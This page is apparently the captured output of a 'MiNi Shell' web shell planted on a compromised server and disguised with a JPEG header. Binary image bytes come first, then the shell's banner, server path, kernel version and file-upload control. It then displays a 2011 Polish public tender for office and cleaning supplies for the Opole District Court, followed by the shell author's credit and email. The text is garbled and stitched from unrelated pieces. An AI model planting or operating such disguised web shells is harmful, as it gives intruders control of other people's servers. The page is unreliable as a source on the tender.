JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110204/17512-N-2011.html

<p class="kh_header"><b>Opole: Sprzedaż i dostawa materiałów biurowych i papierniczych oraz chemii gospodarczej dla Sądu Okręgowego w Opolu w podziale na zadania.</b><br>
<b>Numer ogłoszenia: 17512 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Opolu , Pl. Daszyńskiego 1, 45-064 Opole, woj. opolskie, tel. +48 077 5418100, faks +48 077 5418121.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opole.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa materiałów biurowych i papierniczych oraz chemii gospodarczej dla Sądu Okręgowego w Opolu w podziale na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla Zadania nr 1 jest sprzedaż i dostawa  dla Sądu Okręgowego w Opolu wymienionych w Załączniku nr 1a do oferty materiałów biurowych i papierniczych w okresie trwania umowy.
Zaoferowane materiały biurowe i papiernicze muszą być fabrycznie nowe, w przypadku wskazań konkretnych produktów, Wykonawcy mogą zaproponować rozwiązania równoważne wskazanym, o parametrach jakościowych nie gorszych niż określone przez Zamawiającego.
Wykonawca zobowiązany jest do wpisania w każdej pozycji Formularza cenowego oferty, stanowiącego Załącznik nr 1a do oferty, nazwę produktu oferowanego.
Zamawiający zastrzega sobie możliwość zrealizowania przedmiotu zamówienia zgodnie z ilościami minimalnymi określonymi w pkt 3.3.1. SIWZ. Wykonawca realizuje przedmiot zamówienia w ilościach minimalnych. Jednakże, Zamawiający może w każdym z wskazanych w pkt. 3.3.1. SIWZ asortymencie dokonać zamówienia do wielkości określonej jako maksymalna. 
Warunki reklamacji zostały określone w § 4 Projektu Umowy stanowiącego Załącznik nr 4 do SIWZ.
Materiały biurowe i papiernicze powinny być opakowane w sposób zabezpieczający przed zniszczeniem i zamoczeniem. Zostaną dostarczone i wniesione do magazynu Zamawiającego na koszt Wykonawcy.
Zamawiający przewiduje dostawy sukcesywne, realizowane na bieżąco, na podstawie zapotrzebowań przekazywanych przez Zamawiającego w terminie do 7 dni roboczych od daty otrzymania przez Wykonawcę zapotrzebowania przekazanego za pomocą faxu.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
Przedmiotem zamówienia dla Zadania nr 2 jest sprzedaż i dostawa dla Sądu Okręgowego w Opolu wymienionych w Załaczniku nr 1b artykułów chemii gospodarczej
Zaoferowane artykuły chemii gospodarczej muszą być fabrycznie nowe, w przypadku wskazań  konkretnych produktów, Wykonawcy mogą zaproponować rozwiązania równoważne wskazanym, o parametrach jakościowych nie gorszych niż określone przez Zamawiającego.
Wszystkie dostarczone artykuły chemii gospodarczej zaproponowane przez Wykonawcę muszą posiadać atesty PZH.
Termin przydatności artykułów chemii gospodarczej będących przedmiotem zamówienia nie może być krótszy niż okres gwarancji wskazany przez Producenta, jednak nie mniej niż 6 miesięcy od daty dostawy.
Wykonawca zobowiązany jest do wpisania w każdej pozycji Formularza cenowego oferty, stanowiącego Załącznik nr 1b do oferty, nazwę produktu oferowanego.
Zamawiający zastrzega sobie możliwość zrealizowania przedmiotu zamówienia zgodnie z ilościami minimalnymi określonymi w pkt 3.4.1. SIWZ. Wykonawca realizuje przedmiot zamówienia w ilościach minimalnych. Jednakże, Zamawiający może w każdym z wskazanych w pkt. 3.4.1. SIWZ asortymencie dokonać zamówienia do wielkości określonej jako maksymalna. 
Warunki reklamacji zostały określone w § 4 Projektu Umowy stanowiącego Załącznik nr 4 do SIWZ.
Artykuły chemii gospodarczej powinny być opakowane w sposób zabezpieczający przed zniszczeniem i zamoczeniem. Zostaną dostarczone i wniesione do magazynu Zamawiającego na koszt Wykonawcy.
Zamawiający przewiduje dostawy sukcesywne, realizowane na bieżąco, na podstawie zapotrzebowań przekazywanych przez Zamawiającego w terminie do 7 dni roboczych od daty otrzymania przez Wykonawcę zapotrzebowania przekazanego za pomocą faxu.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.00-2, 39.80.00.00-0, 39.83.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo w oryginale lub poświadczone notarialnie. 
Pełnomocnictwo nie jest wymagane, jeżeli podpisujący jest lub są właścicielami firmy lub, jeżeli są oni wymienieni z imienia i nazwiska w odnośnym dokumencie rejestracyjnym jako osoby uprawnione do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
W przypadku zmiany obowiązującej stawki VAT, Zamawiający i Wykonawca wprowadzą nową stawkę z dniem obowiązywania. przy czym jeżeli zmiana stawki nastąpiła po dacie wystawienia faktury, Wykonawca wprowadzi nową stawkę w kolejnym okresie rozliczeniowym.
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
W przypadku, o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonanej części umowy.
Odstąpienie od umowy następuje w formie pisemnej pod rygorem nieważności takiego oświadczenia i musi zawierać uzasadnienie faktyczne i prawne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opole.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Opolu, pl. Daszyńskiego 1, 45-064 Opole, 
pokój 217(Sekcja Inwestycyjna), II pietro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2011 godzina 10:00, miejsce: Sąd Okręgowy w Opolu, pl. Daszyńskiego 1, 45-064 Opole,
pokój nr 10 (Biuro Podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedaż i dostawa materiałów biurowych i papierniczych dla Sądu Okręgowego w Opolu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla Zadania nr 1 jest sprzedaż i dostawa  dla Sądu Okręgowego w Opolu wymienionych w Załączniku nr 1a do oferty materiałów biurowych i papierniczych w okresie trwania umowy.
Zaoferowane materiały biurowe i papiernicze muszą być fabrycznie nowe, w przypadku wskazań  konkretnych produktów, Wykonawcy mogą zaproponować rozwiązania równoważne wskazanym, o parametrach jakościowych nie gorszych niż określone przez Zamawiającego.
Wykonawca zobowiązany jest do wpisania w każdej pozycji Formularza cenowego oferty, stanowiącego Załącznik nr 1a do oferty, nazwę produktu oferowanego.
Zamawiający zastrzega sobie możliwość zrealizowania przedmiotu zamówienia zgodnie z ilościami minimalnymi określonymi w pkt 3.3.1. SIWZ. Wykonawca realizuje przedmiot zamówienia w ilościach minimalnych. Jednakże, Zamawiający może w każdym z wskazanych w pkt. 3.3.1. SIWZ asortymencie dokonać zamówienia do wielkości określonej jako maksymalna. 
Warunki reklamacji zostały określone w § 4 Projektu Umowy stanowiącego Załącznik nr 4 do SIWZ.
Materiały biurowe i papiernicze powinny być opakowane w sposób zabezpieczający przed zniszczeniem i zamoczeniem. Zostaną dostarczone i wniesione do magazynu Zamawiającego na koszt Wykonawcy.
Zamawiający przewiduje dostawy sukcesywne, realizowane na bieżąco, na podstawie zapotrzebowań przekazywanych przez Zamawiającego w terminie do 7 dni roboczych od daty otrzymania przez Wykonawcę zapotrzebowania przekazanego za pomocą faxu.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedaż i dostawa artykułów chemii gospodarczej dla Sądu Okręgowego w Opolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla Zadania nr 2 jest sprzedaż i dostawa  dla Sądu Okręgowego w Opolu wymienionych w Załączniku nr 1b do oferty artykułów chemii gospodarczej w okresie trwania umowy.
Zaoferowane artykuły chemii gospodarczej muszą być fabrycznie nowe, w przypadku wskazań  konkretnych produktów, Wykonawcy mogą zaproponować rozwiązania równoważne wskazanym, o parametrach jakościowych nie gorszych niż określone przez Zamawiającego.
Wykonawca zobowiązany jest do wpisania w każdej pozycji Formularza cenowego oferty, stanowiącego Załącznik nr 1b do oferty, nazwę produktu oferowanego.
Zamawiający zastrzega sobie możliwość zrealizowania przedmiotu zamówienia zgodnie z ilościami minimalnymi określonymi w pkt 3.4.1. SIWZ. Wykonawca realizuje przedmiot zamówienia w ilościach minimalnych. Jednakże, Zamawiający może w każdym z wskazanych w pkt. 3.4.1. SIWZ asortymencie dokonać zamówienia do wielkości określonej jako maksymalna. 
Warunki reklamacji zostały określone w § 4 Projektu Umowy stanowiącego Załącznik nr 4 do SIWZ.
Artykuły chemii gospodarczej powinny być opakowane w sposób zabezpieczający przed zniszczeniem i zamoczeniem. Zostaną dostarczone i wniesione do magazynu Zamawiającego na koszt Wykonawcy.
Zamawiający przewiduje dostawy sukcesywne, realizowane na bieżąco, na podstawie zapotrzebowań przekazywanych przez Zamawiającego w terminie do 7 dni roboczych od daty otrzymania przez Wykonawcę zapotrzebowania przekazanego za pomocą faxu.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com